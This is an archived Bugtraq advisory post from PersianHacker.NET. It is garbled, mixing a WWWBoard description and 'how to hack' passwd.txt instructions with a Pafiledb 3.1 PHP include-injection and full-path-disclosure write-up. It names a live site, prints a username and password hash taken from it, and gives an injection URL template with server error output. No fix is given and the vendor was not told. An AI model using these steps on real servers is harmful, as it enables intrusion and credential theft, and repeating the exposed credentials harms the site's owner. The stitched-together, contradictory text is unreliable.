[PersianHacker.NET 200502-05] WWWoard passwd

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [PersianHacker.NET 200502-05] WWWoard passwd
From: Pedram Hayati <pi3ch@xxxxxxxxx>
Date: 5 Feb 2005 21:33:27 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm


[Persianhacker.net] Full Path Disclosure and PHP Injection In Pafiledb 3.1 Final

WWWBoard 
is a threaded World Wide Web discussion forum and message board, which allows 
users to post new messages, followup to existing ones and more. The current 
release in 2.0 ALPHA 2.1, which means there still are a few bugs. WWWBoard 2.0 
ALPHA 2.1 comes with a WWWAdmin program, which helps you maintain the WWWBoard. 
ALPHA 2.1 has several security patches over ALPHA 2, which prevent board 
clobbering by followup fields.
More info @:
http://www.phparena.net/pafiledb.php


Discussion: 
--------------------
What is the bug ?
There is a Full Path Disclosure vulnerability in Pafiledb 3.1 which ends to 
disclosure
of page local location on the web server.There is nother bug which let`s h4cK3r
inject php codes and run them on server.

Where is the bug ?
At line 25 of pafiledb.php :

[
if ($login == "do") { include "./includes/$action/login.php"; exit; }
]

as we see $action is used in above statement and it`s not declared yet so 
h4ck3r can
use it for PHP Injection attacks by passing his malicouse string from URL .


Exploit:
--------------------
its very easy expolit 
and here we will learn how to hack from it 
put "wwwboard/passwd.txt" after the url 
exampel www.xxx.comwwwboard/passwd.txt 
and here is the real exampel 
http://www.boardprep.net/wwwboard/passwd.txt 
and you will see the user name and passwaord in md5 
usernameassword 
cknouse:aexMVWnDOyrdE 
[
http://www.example.com/pafiledb.php?login=do&action=[value]
]

which includes PHP codes in :

[
./includes/[value]/login.php
]

and if PHP page doesn`t realy exist at that address , server returns warring 
page
like this :

[

Warning: main(./includes/value/login.php): failed to open stream: No such file 
or
directory in /home/host/public_html/downloads/pafiledb.php on line 25

Warning: main(./includes/value/login.php): failed to open stream: No such file 
or
directory in /home/host/public_html/downloads/pafiledb.php on line 25

Warning: main(): Failed opening './includes/value/login.php' for inclusion 
(include_path='.:/usr/lib/php:/usr/local/lib/php')
in /home/host/public_html/downloads/pafiledb.php
on line 25

]

and this message shows local address of pafiledb.php on server.


Solution:
--------------------
There is no solution at this time.


Credit:
--------------------
Discovered by PersianHacker.NET Security Team 
by amironline452 (d3vilbox  yahoo  com) 
http://www.PersianHacker.NET 


Help
--------------------
visit: http://www.PersianHacker.NET
or mail me @: d3vilbox  yahoo  com


Note
--------------------
Script authors not contacted.

Posted: Tue Dec 21, 2004 5:03 pm    Post subject: how to hack site from 
wwwboard

Prev by Date: directory traversal in RaidenHTTPD 1.1.27
Next by Date: [USN-74-1] Postfix vulnerability
Previous by thread: directory traversal in RaidenHTTPD 1.1.27
Next by thread: [PersianHacker.NET 200502-05] WWWoard passwd
Index(es):
- Date
- Thread